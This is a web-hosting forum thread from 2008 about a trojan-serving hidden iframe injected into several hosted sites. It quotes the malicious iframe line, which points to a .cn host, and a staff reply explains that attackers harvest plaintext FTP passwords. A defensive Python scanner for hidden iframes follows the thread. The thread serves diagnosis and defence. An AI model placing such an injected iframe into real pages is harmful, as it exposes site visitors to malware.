Old February 2nd, 2008, 1:26 PM   #1 (permalink)
Registered User
Comfy Contributor
 
Joined in Oct 2004
107 posts
Gave thanks: 5
Thanked 2 times
JS code insertion - unsecure server?

Hi, a number of users reported a trojan detected on their pages. I found that this code was in common:

<iframe src='http://updateservernet.cn/tank.php' width='1' height='1' style='visibility: hidden;'></iframe>

I also found out that this is inserted into pages on pass39 using a "JS code rootkit", against which the server is apparently unsecured.

Can admins please investigate this, and can pass39 be secured in the future to prevent JS code insertion/hack?
__________________
PASS 39
macdocuk is offline  
Old February 2nd, 2008, 5:01 PM   #2 (permalink)
Surpass Staff
Fresh Surpasser
 
Joined in Dec 2007
5 posts
Gave thanks: 0
Thanked 1 Time in 1 Post
Would you mind posting some example URLs which contain the infected code? I am performing a security audit on this server. I have found a few examples where an ftp account was compromised and used to upload scripts, but there is no indication of a rootkit that I have found. Alternatively, you can open a ticket with the Abuse and Security Department.
Charlie S. is offline  
Old February 4th, 2008, 7:17 AM   #3 (permalink)
Registered User
Hi, I have manually removed the code from the pages of users who reported this. At the moment there is none, that I am aware of, which contains that code.

The previous 2-3 users who had the same or similar code inserted into their pages were all different, i.e. some were PHP-run sites (like Joomla and phpNuke), some had simple HTML files that had this code.

First I blamed it on Joomla's vulnerabilities, but the last one was a simple HTML page with a .htm extension, created with MS Frontpage.

I found info on this "JS code insertion" on the web, and they mentioned a "JS code rootkit" is used for this. Or it may be some other way, only I have no idea.

I will open a support ticket next time and submit the infected URL.
__________________
PASS 39
macdocuk is offline  
Old February 4th, 2008, 10:09 AM   #4 (permalink)
Surpass Staff
Be sure and change the ftp passwords for the affected accounts. Generally speaking with this type of attack, an attacker will harvest an ftp password by searching accounts for passwords stored in plaintext (such as php MySQL database configuration files). They will then use these passwords to insert malicious javascript into an account's code.
Charlie S. is offline  
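
A defender-side check for the injection discussed in this thread, added here as an example (not code from either poster or from Surpass): it walks a site's files and reports iframes that are hidden or sized 0/1 pixel and load from another host. The function names, the `own_hosts` parameter and the sample host `injected.example` are assumptions made for the example.

```python
import os
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SCAN_EXT = (".htm", ".html", ".php")
HIDDEN_STYLE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
# Constructed sample modelled on the iframe quoted in post #1 (placeholder host).
SAMPLE = ("<html><body>\n<p>Welcome</p>\n"
          "<iframe src='http://injected.example/t.php' width='1' height='1' "
          "style='visibility: hidden;'></iframe>\n</body></html>\n")

def is_tiny(value):
    """True for a width/height of 0 or 1, with or without a px suffix."""
    m = re.fullmatch(r"\s*(\d+)\s*(px)?\s*", value or "", re.I)
    return bool(m) and int(m.group(1)) <= 1

class IframeFinder(HTMLParser):
    """Collects (line, src, reasons) for iframes a visitor cannot see."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        if HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")
        if is_tiny(a.get("width")) or is_tiny(a.get("height")):
            reasons.append("tiny-size")
        if reasons:
            self.hits.append((self.getpos()[0], a.get("src", ""), reasons))

def scan_text(text, own_hosts=()):
    """Hidden iframes in text whose src names a host that is not in own_hosts."""
    finder = IframeFinder()
    finder.feed(text)
    return [h for h in finder.hits
            if urlparse(h[1]).hostname not in (None, *own_hosts)]

def scan_tree(root, own_hosts=()):
    """Walk a docroot and yield (path, line, src, reasons) for every hit."""
    for dirpath, _dirs, files in os.walk(root):
        for name in (f for f in files if f.lower().endswith(SCAN_EXT)):
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_text(fh.read(), own_hosts)
            yield from ((path, *hit) for hit in hits)
```

An iframe that is written out by script inside a `<script>` block is not parsed as a tag, so this check will not report it.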